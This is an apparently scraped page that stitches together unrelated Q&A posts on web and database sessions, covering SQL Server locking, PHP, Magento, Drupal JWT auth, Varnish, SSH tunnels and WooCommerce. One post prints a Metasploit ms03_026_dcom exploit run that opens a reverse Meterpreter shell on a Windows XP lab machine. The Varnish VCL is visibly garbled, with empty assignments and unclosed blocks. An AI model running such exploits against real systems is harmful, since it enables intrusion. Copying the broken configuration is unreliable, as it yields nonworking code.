Does SQL Server escalate to table locks based on total lock count or per-session lock count?

I have a table that receives both mass sequential inserts at the end of the clustered index (CI) and random (highly distributed) reads and updates. Naturally, the mass inserts should not block the random access. RCSI is used, so the read-only queries shouldn’t affect the lock count (?) relative to the sequential insert.

My concern is that, even when limiting the maximum number of locks taken during the insert (e.g. by inserting in batches), it is possible for one (or more) of the OLTP updates to push past this limit. If the lock count heuristic is per-session, then this is less of a potential issue.

Given the answer to the question in the title, what is the “best” way to prevent table lock escalation here?

My current approach/thought is to pick a batch row count (e.g. an arbitrary 1–4k) during the mass inserts to allow “some slack”, although this feels imprecise overall. While batches are essential anyway to deal with replication and such, it would be nice to specify a batch size of 5k rows and move on. (To be fair, quick table locks aren’t really the issue: the intent of the question is more about finding the edge such that table lock escalation doesn’t happen.)

There has been DBA pushback on both 1) disabling row locks (to ensure page locks and thus reduce lock counts) and 2) disabling table lock escalation (with forced page locks to minimize the worst case). Are there any other relevant database properties to consider with respect to lock escalation? (Increasing the lock limit to, say, 10k would then allow a much larger “slack” batch size.)
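For context: SQL Server attempts escalation when a single statement accumulates roughly 5,000 locks on one table or index (evaluated per statement, per table, not as a server-wide total), although there is also a separate instance-level trigger based on total lock memory pressure. The usual levers are therefore batching below that threshold, or disabling escalation per table. A sketch, assuming a hypothetical staging table feeding the target (names are illustrative):

```sql
-- Option 1: stop escalation to table locks on this table entirely;
-- SQL Server then keeps taking row/page locks instead.
ALTER TABLE dbo.TargetTable SET (LOCK_ESCALATION = DISABLE);

-- Option 2: keep each insert statement under the ~5,000-lock
-- escalation threshold by moving rows in batches.
DECLARE @rows INT = 1;
WHILE @rows > 0
BEGIN
    DELETE TOP (4000)
    FROM dbo.Staging
    OUTPUT deleted.Col1, deleted.Col2
    INTO dbo.TargetTable (Col1, Col2);

    SET @rows = @@ROWCOUNT;
END;
```

This is only a sketch of the two options under discussion, not a recommendation between them; note that a concurrent update statement on the same table gets its own per-statement escalation counter.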

php – Getting session data with foreach

It seems simple, but I’ve spent the whole night researching and testing several methods and can’t get anything to work. So I decided to post.

I have the following item in the session:

  array(6) {
    string(17) "teste app legenda"
    string(39) "https://..."
    string(294) "https://..."
    ...
  }

My test code:

*line 59:* foreach ($_SESSION as $array) {
*line 60:*     foreach ($array as $key => $midia) {
*line 61:*         print "$key : $midia<br>";
*line 62:*     }
*line 63:* }

In theory, the result looks satisfactory:

getCreatedTime : 1618373661
getCaption : teste app legenda
getCommentsCount : 3
getLikesCount : 4
getLink : https://...
getImageHighResolutionUrl : https://...

I get the following errors:

Warning: foreach() argument must be of type array|object, string given **on line 60**
Warning: foreach() argument must be of type array|object, int given **on line 60**

When I try to display the data, for example, I get no output.


I still get this error:

Warning: Undefined array key "getCreatedTime"

Where am I going wrong?
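The warnings on line 60 suggest `$_SESSION` holds scalar values alongside the array entry, so the inner `foreach` fails for those. A minimal sketch of a guard (the session keys here are illustrative, not the actual ones):

```php
<?php
// Simulated session: one array entry plus scalar entries, matching
// the mix that the line-60 warnings imply.
$_SESSION = [
    'midia' => [
        'getCaption' => 'teste app legenda',
        'getCommentsCount' => 3,
    ],
    'user_id' => 27,     // int entry: would trigger the "int given" warning
    'token' => 'abc123', // string entry: would trigger the "string given" warning
];

foreach ($_SESSION as $entry) {
    // Skip scalar session values; iterating them with foreach is what
    // raises "foreach() argument must be of type array|object".
    if (!is_array($entry)) {
        continue;
    }
    foreach ($entry as $key => $midia) {
        print "$key : $midia<br>";
    }
}
```

With the guard, only the array entry is iterated and the scalar entries are silently skipped.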

magento2.3 – Session destroyed in N Genius payment gateway Magento 2.3

I have created an N Genius hosted-session payment gateway module for my project in Magento 2.3. I use an iframe to show the 3-D Secure form in this module. After the 3-D Secure submit, I set some values in the checkout session for later use. Payment and order are placed successfully on the first try, but from the next time onward it stops working, because the data I saved in the session is not available in the 3-D response controller file. The session is getting destroyed. I have also tried the customer session, but no luck. I have checked the URLs; the request and response use the same HTTPS URL. Has anyone faced such an issue? Any idea about this?

flags – Success with cookie, fails with JWT: RuntimeException: Failed to start the session because headers have already been sent

My Controller is working with cookie auth but failing with JWT. This Controller is supposed to flag an entity for the logged-in user.

If I am using cookie auth, there are no errors and everything works as expected.

But when I try to use JWT, although the entity does get flagged correctly, I get the following error in the Drupal logs:

RuntimeException: Failed to start the session because headers have
already been sent by "/app/vendor/symfony/http-foundation/Response.php"
at line 377. in (line 150 of

How do I fix this error?

Here’s how I’m using JWT auth in Postman:



  • Accept: application/vnd.api+json
  • Content-Type: application/vnd.api+json
  • Cache: no-cache
  • Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2MTgyMDk4MjAsImV4cCI6MTYyMzM5MzgyMCwiZHJ1cGFsIjp7InVpZCI6IjI3In19.5uDJMtokLXD6K63H5Ikb-F870EYFMrgE4mItTuTT3bI

Request body:

    "entity_id": "14"

As for the Controller, here’s MYMODULE.routing.yml:

MYMODULE.api_flagging:
  path: '/api/group_add'
  defaults:
    _controller: '\Drupal\MYMODULE\Controller\ApiFlagging::flag'
  methods: [POST]
  requirements:
    _permission: 'view own commerce_order'
    _format: 'json'
  options:
    no_cache: 'TRUE'

Here’s ApiFlagging.php:


<?php

namespace Drupal\MYMODULE\Controller;

use Drupal\Core\Controller\ControllerBase;
use Drupal\flag\FlagServiceInterface;
use Symfony\Component\DependencyInjection\ContainerInterface;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpKernel\Exception\BadRequestHttpException;
use Symfony\Component\Serializer\Encoder\JsonEncoder;
use Symfony\Component\Serializer\Serializer;

/**
 * Class ApiFlagging.
 */
class ApiFlagging extends ControllerBase {

  const FLAG_ID = 'ABC';

  /**
   * The flag service.
   *
   * @var \Drupal\flag\FlagServiceInterface
   */
  protected $flagService;

  /**
   * The serializer.
   *
   * @var \Symfony\Component\Serializer\Serializer
   */
  protected $serializer;

  /**
   * The available serialization formats.
   *
   * @var array
   */
  protected $serializerFormats = [];

  /**
   * Constructs a new ApiFlagging object.
   */
  public function __construct(Serializer $serializer, array $serializer_formats, FlagServiceInterface $flag) {
    $this->serializer = $serializer;
    $this->serializerFormats = $serializer_formats;
    $this->flagService = $flag;
  }

  /**
   * {@inheritdoc}
   */
  public static function create(ContainerInterface $container) {
    if ($container->hasParameter('serializer.formats') && $container->has('serializer')) {
      $serializer = $container->get('serializer');
      $formats = $container->getParameter('serializer.formats');
    }
    else {
      $formats = ['json'];
      $encoders = [new JsonEncoder()];
      $serializer = new Serializer([], $encoders);
    }
    return new static($serializer, $formats, $container->get('flag'));
  }

  /**
   * Flagging.
   */
  public function flag(Request $request) {
    $format = $this->getRequestFormat($request);

    $content = $request->getContent();
    $flagData = $this->serializer->decode($content, $format);
    $flag = $this->flagService->getFlagById(self::FLAG_ID);
    $flaggableEntityTypeId = $flag->getFlaggableEntityTypeId();

    $my_goals = NULL;
    if (array_key_exists('goals', $flagData)) {
      $my_goals = $flagData['goals'];
    }

    $entity = \Drupal::entityTypeManager()
      ->getStorage($flaggableEntityTypeId)
      ->load($flagData['entity_id']);

    if ($my_goals === NULL) {
      return new JsonResponse([
        'error_message' => 'Goals not set.',
      ], 400);
    }

    try {
      /** @var \Drupal\flag\Entity\Flagging $flagging */
      $flag->set('field_goals', $my_goals);
      $flagging = $this->flagService->flag($flag, $entity);
    }
    catch (\LogicException $e) {
      $message = $e->getMessage();
      kint('error', $e);
      return new JsonResponse([
        'error_message' => $message,
      ], 400);
    }

    return new JsonResponse([
      'message' => 'flag success',
      'flagging_uuid' => $flagging->uuid(),
      'flagging_id' => $flagging->id(),
      'flag_id' => $flagging->getFlagId(),
    ]);
  }

  /**
   * Gets the format of the current request.
   *
   * @param \Symfony\Component\HttpFoundation\Request $request
   *   The current request.
   *
   * @return string
   *   The format of the request.
   */
  protected function getRequestFormat(Request $request) {
    $format = $request->getRequestFormat();
    if (!in_array($format, $this->serializerFormats)) {
      throw new BadRequestHttpException("Unrecognized format: $format.");
    }
    return $format;
  }

}

magento2 – Magento 2 Varnish caching add to cart session from another user

When adding an item to the cart, it also shows a second item, which I previously added to the cart from a different device. If I bypass the Varnish cache, the cart seems to work OK. I guess I am missing a setting about cookies and sessions? Here is my Varnish default.vcl:

# VCL version 5.0 is not supported, so 4.x syntax is used even though the Varnish version actually in use is 6
vcl 4.1;

import std;

backend default {
    .path = "/run/nginx/nginx.sock";
    #.host = "localhost";
    #.port = "8080";
    .first_byte_timeout = 600s;
    .probe = {
        .url = "/health_check.php";
        .timeout = 2s;
        .interval = 5s;
        .window = 10;
        .threshold = 5;
    }
}

acl purge {
    "localhost";
}

sub vcl_recv {

    # Implement websocket support
    if (req.http.Upgrade ~ "(?i)websocket") {
        return (pipe);
    }

    # Deny forbidden IPs
    if (client.ip ~ forbidden) {
        return (synth(403, "Forbidden"));
    }

    # Normalize hostname to avoid double caching
    set = regsub(, "^$", "");

    # Allow purging from ACL
    if (req.method == "PURGE") {
        if (client.ip !~ purge) {
            return (synth(405, "Method not allowed"));
        }
        # To use the X-Pool header for purging varnish during automated deployments, make sure the X-Pool header
        # has been added to the response in your backend server config. This is used, for example, by the
        # capistrano-magento2 gem for purging old content from varnish during its deploy routine.
        if (!req.http.X-Magento-Tags-Pattern && !req.http.X-Pool) {
            return (synth(400, "X-Magento-Tags-Pattern or X-Pool header required"));
        }
        if (req.http.X-Magento-Tags-Pattern) {
            ban("obj.http.X-Magento-Tags ~ " + req.http.X-Magento-Tags-Pattern);
        }
        if (req.http.X-Pool) {
            ban("obj.http.X-Pool ~ " + req.http.X-Pool);
        }
        return (purge);
    }


    # Brotli Compression
    if (req.http.Accept-Encoding ~ "br" && req.url !~
            "\.(jpg|png|gif|gz|mp3|mov|avi|mpg|mp4|swf|wmf)$") {
        set req.http.X-brotli = "true";
    }

# Tell PageSpeed not to use optimizations specific to this request.
  set req.http.PS-CapabilityList = "fully general optimizations only";

# Don't allow external entities to force beaconing.
  #unset req.http.PS-ShouldBeacon;

### Cookies

    # Remove any Google Analytics based cookies
    set req.http.Cookie = regsuball(req.http.Cookie, "__utm.=[^;]+(; )?", "");
    set req.http.Cookie = regsuball(req.http.Cookie, "_ga=[^;]+(; )?", "");
    set req.http.Cookie = regsuball(req.http.Cookie, "_gat=[^;]+(; )?", "");
    set req.http.Cookie = regsuball(req.http.Cookie, "utmctr=[^;]+(; )?", "");
    set req.http.Cookie = regsuball(req.http.Cookie, "utmcmd.=[^;]+(; )?", "");
    set req.http.Cookie = regsuball(req.http.Cookie, "utmccn.=[^;]+(; )?", "");

    # Remove DoubleClick offensive cookies
    set req.http.Cookie = regsuball(req.http.Cookie, "__gads=[^;]+(; )?", "");

    # Remove the AddThis cookies
    set req.http.Cookie = regsuball(req.http.Cookie, "__atuv.=[^;]+(; )?", "");

    # Remove has_js and Cloudflare/Google Analytics __* cookies.
    set req.http.Cookie = regsuball(req.http.Cookie, "(^|;\s*)(_[_a-z]+|has_js)=[^;]*", "");
    # Remove a ";" prefix, if present.
    set req.http.Cookie = regsub(req.http.Cookie, "^;\s*", "");

    if (req.http.X-Forwarded-Proto !~ "(?i)https") {
        set req.http.x-Redir-Url = "https://" + + req.url;
        return (synth(750));
    }

    # Setting http headers for backend
    set req.http.X-Forwarded-For = client.ip;
    set req.http.X-Forwarded-Proto = "https";

    # Unset headers that might cause us to cache duplicate infos
    unset req.http.Accept-Language;
    unset req.http.User-Agent;
    ### Do not Cache: special cases ###

    # Do not cache AJAX requests.
    if (req.http.X-Requested-With == "XMLHttpRequest") {
        return (pass);
    }

    # POST requests will not be cached
    if (req.http.Authorization || req.method == "POST") {
        return (pass);
    }

    # on PROXY connections the server.ip is the IP the client connected to
    # (typically the DNS-visible SSL/TLS virtual IP)
    std.log("Client connected to " + server.ip);
    if (std.port(server.ip) == 443) {
        # client.ip for PROXY requests is set to the real client IP, not the
        # SSL/TLS terminating proxy
        std.log("Real client connecting over SSL/TLS from " + client.ip);
    }

    # Exclude from cache
    if (req.url ~ "^/pagespeed_admin") {
        return (pass);
    }
    if (req.url ~ "^/pagespeed_global_admin") {
        return (pass);
    }
    # Bypass shopping cart, checkout
    if (req.url ~ "^/checkout") {
        return (pass);
    }

    if (req.http.User-Agent ~ "GoogleStackdriverMonitoring-UptimeChecks") {
        return (pass);
    }

    # Don't cache pagespeed as it already caches its resources
    if (req.url ~ "\.pagespeed\.([a-z]\.)?[a-z]{2}\.[^.]{20}\.[^.]+") {
        return (pass);
    }

    # If too many restarts
    if (req.restarts > 0) {
        set req.hash_always_miss = true;
    }


    # Only deal with "normal" types
    if (req.method != "GET" &&
        req.method != "HEAD" &&
        req.method != "PUT" &&
        req.method != "POST" &&
        req.method != "TRACE" &&
        req.method != "OPTIONS" &&
        req.method != "DELETE") {
        /* Non-RFC2616 or CONNECT which is weird. */
        return (pipe);
    }

    # We only deal with GET and HEAD by default
    if (req.method != "GET" && req.method != "HEAD") {
        return (pass);
    }

    # Bypass health check requests
    if (req.url ~ "/pub/health_check.php") {
        return (pass);
    }

    # Set initial grace period usage status
    set req.http.grace = "none";

    # normalize url in case of leading HTTP scheme and domain
    set req.url = regsub(req.url, "^http(s)?://", "");

    # collect all cookies into a single header
    std.collect(req.http.Cookie);

    # Compression filter
    if (req.http.Accept-Encoding) {
        if (req.url ~ "\.(jpg|jpeg|png|gif|gz|tgz|bz2|tbz|mp3|ogg|swf|flv)$") {
            # No point in compressing these
            unset req.http.Accept-Encoding;
        } elsif (req.http.Accept-Encoding ~ "gzip") {
            set req.http.Accept-Encoding = "gzip";
        } elsif (req.http.Accept-Encoding ~ "deflate" && req.http.user-agent !~ "MSIE") {
            set req.http.Accept-Encoding = "deflate";
        } else {
            # unknown algorithm
            unset req.http.Accept-Encoding;
        }
    }

    # Remove all marketing get parameters to minimize the cache objects
    if (req.url ~ "(\?|&)(gclid|cx|ie|cof|siteurl|zanpid|origin|fbclid|mc_[a-z]+|utm_[a-z]+|_bta_[a-z]+)=") {
        set req.url = regsuball(req.url, "(gclid|cx|ie|cof|siteurl|zanpid|origin|fbclid|mc_[a-z]+|utm_[a-z]+|_bta_[a-z]+)=[-_A-z0-9+()%.]+&?", "");
        set req.url = regsub(req.url, "(\?|&)+$", "");
    }

    # Static files caching
    if (req.url ~ "^/(pub/)?(media|static)/.*\.(ico|html|css|js|jpg|jpeg|png|gif|tiff|webp|bmp|mp3|ogg|svg|swf|woff|woff2|eot|ttf|otf)$") {
        # Static files should not be cached by default
        return (pass);

        # But if you use a few locales and don't use a CDN, you can enable caching of static files
        # by commenting the previous line (return (pass);) and uncommenting the next 3 lines
        #unset req.http.Https;
        #unset req.http.X-Forwarded-Proto;
        #unset req.http.Cookie;
    }

    # Authenticated GraphQL requests should not be cached by default
    if (req.url ~ "/graphql" && req.http.Authorization ~ "^Bearer") {
        return (pass);
    }

    return (hash);
}

sub vcl_synth {
    if (resp.status == 750) {
        set resp.status = 301;
        set resp.http.Location = req.http.x-Redir-Url;
        return (deliver);
    }
}

sub vcl_hash {
    # Brotli
    if (req.http.X-brotli == "true" && req.http.X-brotli-unhash != "true") {
        hash_data("brotli");
    }
    if (req.http.cookie ~ "X-Magento-Vary=") {
        hash_data(regsub(req.http.cookie, "^.*?X-Magento-Vary=([^;]+);*.*$", "\1"));
    }

    # For multi site configurations to not cache each other's content
    if ( {
    } else {

    if (req.url ~ "/graphql") {
        call process_graphql_headers;
    }
}


sub process_graphql_headers {
    if (req.http.Store) {
    if (req.http.Content-Currency) {
}

sub vcl_backend_fetch {
    if (bereq.http.X-brotli == "true") {
        set bereq.http.Accept-Encoding = "br";
        unset bereq.http.X-brotli;
    }
}

sub vcl_pipe {
    if (req.http.upgrade) {
        set bereq.http.upgrade = req.http.upgrade;
    }
    return (pipe);
}

sub vcl_backend_response {
    set beresp.http.X-Host =;

    set beresp.grace = 3d;

    if (beresp.http.Content-Type ~ "text/html") {
        unset beresp.http.Cache-Control;
        set beresp.http.Cache-Control = "no-cache, max-age=0";
        return (deliver);
    }

    if (beresp.http.content-type ~ "text") {
        set beresp.do_esi = true;
    }

    if (bereq.url ~ "\.js$" || beresp.http.content-type ~ "text") {
        set beresp.do_gzip = true;
    }

    if (beresp.http.X-Magento-Debug) {
        set beresp.http.X-Magento-Cache-Control = beresp.http.Cache-Control;
    }

    # cache only successful responses and 404s
    if (beresp.status != 200 && beresp.status != 404) {
        set beresp.ttl = 0s;
        set beresp.uncacheable = true;
        return (deliver);
    } elsif (beresp.http.Cache-Control ~ "private") {
        set beresp.uncacheable = true;
        set beresp.ttl = 86400s;
        return (deliver);
    }

    # validate if we need to cache it and prevent from setting cookie
    if (beresp.ttl > 0s && (bereq.method == "GET" || bereq.method == "HEAD")) {
        # unset the cookie for GET or HEAD requests
        unset beresp.http.set-cookie;
    }

    if (bereq.url !~ "\.(ico|css|js|jpg|jpeg|png|gif|tiff|bmp|gz|tgz|bz2|tbz|mp3|ogg|svg|swf|woff|woff2|eot|ttf|otf)(\?|$)") {
        set beresp.http.Pragma = "no-cache";
        set beresp.http.Expires = "-1";
        set beresp.http.Cache-Control = "no-store, no-cache, must-revalidate, max-age=0";
    }

    # "Microcache" for search
    if (bereq.url ~ "/catalogsearch") {
        set beresp.ttl = 30m;
    }

    # If page is not cacheable then bypass varnish for 2 minutes as Hit-For-Pass
    if (beresp.ttl <= 0s ||
        beresp.http.Surrogate-control ~ "no-store" ||
        (!beresp.http.Surrogate-Control &&
        beresp.http.Cache-Control ~ "no-cache|no-store") ||
        beresp.http.Vary == "*") {
        # Mark as Hit-For-Pass for the next 2 minutes
        set beresp.ttl = 120s;
        set beresp.uncacheable = true;
    }

    return (deliver);
}

sub vcl_deliver {
    if (resp.http.X-Magento-Debug) {
        if (resp.http.x-varnish ~ " ") {
            set resp.http.X-Magento-Cache-Debug = "HIT";
            set resp.http.Grace = req.http.grace;
        } else {
            set resp.http.X-Magento-Cache-Debug = "MISS";
        }
    } else {
        unset resp.http.Age;
    }

    unset resp.http.X-Magento-Debug;
    unset resp.http.X-Magento-Tags;
    unset resp.http.X-Powered-By;
    unset resp.http.Server;
    unset resp.http.X-Varnish;
    unset resp.http.Via;
    unset resp.http.Link;
}

sub vcl_hit {
    if (obj.ttl >= 0s) {
        # Hit within TTL period
        return (deliver);
    }
    if (std.healthy(req.backend_hint)) {
        if (obj.ttl + 300s > 0s) {
            # Hit after TTL expiration, but within grace period
            set req.http.grace = "normal (healthy server)";
            return (deliver);
        } else {
            # Hit after TTL and grace expiration
            return (restart);
        }
    } else {
        # server is not healthy, retrieve from cache
        set req.http.grace = "unlimited (unhealthy server)";
        return (deliver);
    }
}

sub vcl_purge {
    # repeat purge for the brotli or gzip object
    # (force hash/no hash on "brotli" while doing another purge)
    # set Accept-Encoding: gzip so that we don't get a brotli-encoded response upon purge
    if (req.url !~ "\.(jpg|png|gif|gz|mp3|mov|avi|mpg|mp4|swf|wmf)$" &&
            !req.http.X-brotli-unhash) {
        if (req.http.X-brotli == "true") {
            set req.http.X-brotli-unhash = "true";
            set req.http.Accept-Encoding = "gzip";
        } else {
            set req.http.X-brotli-unhash = "false";
            set req.http.Accept-Encoding = "br";
        }
        return (restart);
    }
}
 core – Session Scoped Dependency Injection vs Caching in Data Access Layer

The issue at hand is that I don’t want to repeatedly hit the DB to look up user information for the logged in user over the course of the many requests made within a single session.

My first inclination is to use session-scoped dependency injection; however, this isn’t possible with the out-of-the-box DI features provided by Microsoft. I could install Autofac, and that seems like a perfectly reasonable solution to me. However, I seem to recall reading that Microsoft didn’t include this ability because they felt it was bad practice, though I don’t recall their reasons at the moment.

Then it occurred to me that the way people at Microsoft would probably handle this is through the fact that Entity Framework would just cache the results. However, I’m not using EF, and the solution I’m using does not provide caching, though I could easily add some caching to it.

So I’m wondering if I should 1) Install Autofac or 2) Add caching features to my data access layer.

Are there any serious reasons I should avoid 1)? (That is, not avoiding Autofac in general, but installing it specifically to get session-scoped DI.) I think that’s what I will probably end up doing unless I can find a substantial reason not to.

tunneling – SSH reverse tunnels: can the intermediate server eavesdrop on an SSH session?

Suppose there are three computers: (1) my laptop, (2) a server that has a public static IP address, and (3) a Raspberry Pi behind a NAT. I connect from (1) to (3) via (2) as explained below.

On the server (2), I add GatewayPorts yes to /etc/ssh/sshd_config and reload the SSH daemon: sudo systemctl reload sshd.service.

On the Raspberry Pi, I create a reverse SSH tunnel to the server:

rpi$ ssh -R 2222:localhost:22 username-on-server@server-ip-address

On my laptop, I am now able to connect to the Raspberry Pi using:

laptop$ ssh -p 2222 username-on-pi@server-ip-address

The question is: is the server able to see the data sent between my laptop and the Raspberry Pi? Can the server eavesdrop on the SSH session between my laptop and the Raspberry Pi?
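For what it’s worth, the setup above can be checked empirically: the SSH session negotiated on port 2222 terminates on the Raspberry Pi, so the host key presented through the tunnel should match the Pi’s own host key, and the intermediate server only relays ciphertext. A sketch using standard OpenSSH tooling (server-ip-address is the placeholder from above):

```shell
# Fingerprint of the host key offered through the tunnel (i.e. the key
# the laptop actually authenticates against on port 2222):
ssh-keyscan -p 2222 -t ed25519 server-ip-address 2>/dev/null | ssh-keygen -lf -

# Fingerprint of the Pi's own host key, read on the Pi itself:
ssh-keygen -lf /etc/ssh/ssh_host_ed25519_key.pub
```

If the two fingerprints match, the laptop is doing end-to-end SSH with the Pi and the server in the middle cannot read the session contents (though it can still observe connection metadata).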

windows – Unknown Command problem in Meterpreter Win XP session

Using a VirtualBox Kali machine to attack a Win XP SP0 machine, I manage to establish a meterpreter session by running windows/meterpreter/reverse_tcp, which appears to successfully open a meterpreter session. However, no commands execute at the meterpreter prompt. pwd, ls, etc. all just respond Unknown command: pwd.

msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[*] Started reverse TCP handler on 
[*] - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp: ...
[*] - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp: ...
[*] - Sending exploit ...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (175203 bytes) to
[*] Meterpreter session 8 opened ( -> at 2021-03-23 06:36:35 -0400
meterpreter > pwd
[-] Unknown command: pwd.

Any help on getting commands to work on the remote machine would be much appreciated.

Session variable disappears after callback to WooCommerce gateway API link

I am trying to create a plugin for WooCommerce that stores some value into $_SESSION['myVar'] before the payment process and reads it back on the Thank You page.
Everything works fine, but when I use a gateway that makes a callback with POST info about the payment to the API link, $_SESSION['myVar'] becomes empty and I can’t get the value from it on the Thank You page.

How I did it:

// Register the session
add_action( 'init', __CLASS__ . '::register_session' );

public static function register_session() {
    if ( ! session_id() ) {
        session_start();
    }
}

// Set the session variable before payment
$_SESSION['myVar'] = 'my value';

// Trying to get the session value after payment
echo $_SESSION['myVar']; // NULL

Thank you!